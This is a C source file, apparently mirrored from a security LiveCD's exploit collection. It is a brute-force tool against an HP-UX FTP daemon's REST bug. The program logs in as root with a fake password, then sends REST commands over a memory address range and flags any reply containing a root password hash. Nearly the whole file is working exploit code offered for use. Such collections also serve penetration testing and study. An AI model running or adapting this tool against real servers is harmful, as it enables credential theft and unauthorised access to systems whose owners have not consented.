home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / hpux / remote / hp-ux.c

< prev

Wrap

C/C++ Source or Header  |  2005-05-06  |  2KB  |  96 lines

---

1. /* 
2.  * Author: phased
3.  *
4.  *str0ke
5. */
6.  
7. #include <sys/types.h>
8. #include <sys/socket.h>
9. #include <netinet/in.h>
10. #include <arpa/inet.h>
11. #include <netdb.h>
12. #include <stdio.h>
13. #include <unistd.h>
14.  
15. int main (int argc, char *argv[]) {
16.  
17.       int sock, rc;
18.         long int i;
19.           struct sockaddr_in saddr;
20.             struct hostent *h;
21.           char buf[256];
22.  
23.             printf("DMhpux FTPd - REST bug brute forcer\n");
24.               printf("by phased\n");
25.  
26.                 if(argc < 2) {
27.                     printf("usage: %s <host> -- simple enough?\n",argv[0]);
28.                         exit(1);
29.                   }
30.               h = gethostbyname(argv[1]);
31.                 if(h==NULL) {
32.                         printf("%s: unknown host '%s'\n",argv[0],argv[1]);
33.                         exit(1);
34.                         }
35.  
36.                   saddr.sin_family = h->h_addrtype;
37.                     memcpy((char *) &saddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
38.                   saddr.sin_port = htons(21);
39.  
40.                     sock = socket(AF_INET, SOCK_STREAM, 0);
41.                       if(sock<0) {
42.                               perror("cannot open socket ");
43.                               exit(1);
44.                                 }
45.  
46.                         rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr));
47.                       if(rc<0) {
48.                               perror("cannot connect ");
49.                                   exit(1);
50.                                 }
51.  
52.                         printf("Sending false login credentials\n");
53.                          snprintf(buf, sizeof(buf), "USER root\r\n");
54.                            printf("sending %s\n", buf);
55.                              rc = send(sock, buf, strlen(buf), 0);
56.                            if(rc<0) {
57.                                        perror("cannot send data ");
58.                                            close(sock);
59.                                                exit(0);
60.                                              }
61.                              dorecv(sock);
62.                                  usleep(1000);
63.                               memset(buf, 0, sizeof(buf));
64.                                 snprintf(buf, sizeof(buf), "PASS foo\r\n");
65.                                   printf("sending %s\n", buf);
66.                                     rc = send(sock, buf, strlen(buf), 0);
67.                                 usleep(1000);
68.                                   dorecv(sock);
69.                                     dorecv(sock);
70.  
71.                                       for(i=1073931080;i<=1073945000;i = i+10) {
72.                                                   snprintf(buf, sizeof(buf), "REST %d\r\n", i);
73.                                                       printf("sending %s\n", buf);
74.                                                           send(sock, buf, strlen(buf), 0);
75.                                                               dorecv(sock);
76.                                                            }
77.  
78.  
79.                                       return 0;
80.  
81. }
82.  
83. int dorecv(int sock) {
84.     char buf[256];
85.     char *check;
86.  
87.     memset(buf, 0, sizeof(buf));
88.     recv(sock, buf, sizeof(buf), 0);
89.     printf("got: %s\n", buf);
90.     check = (char *)strstr(buf, "root");
91.     if(check != NULL) {
92.                 printf("Got root hash\n");
93.     }
94.  
95. }
96.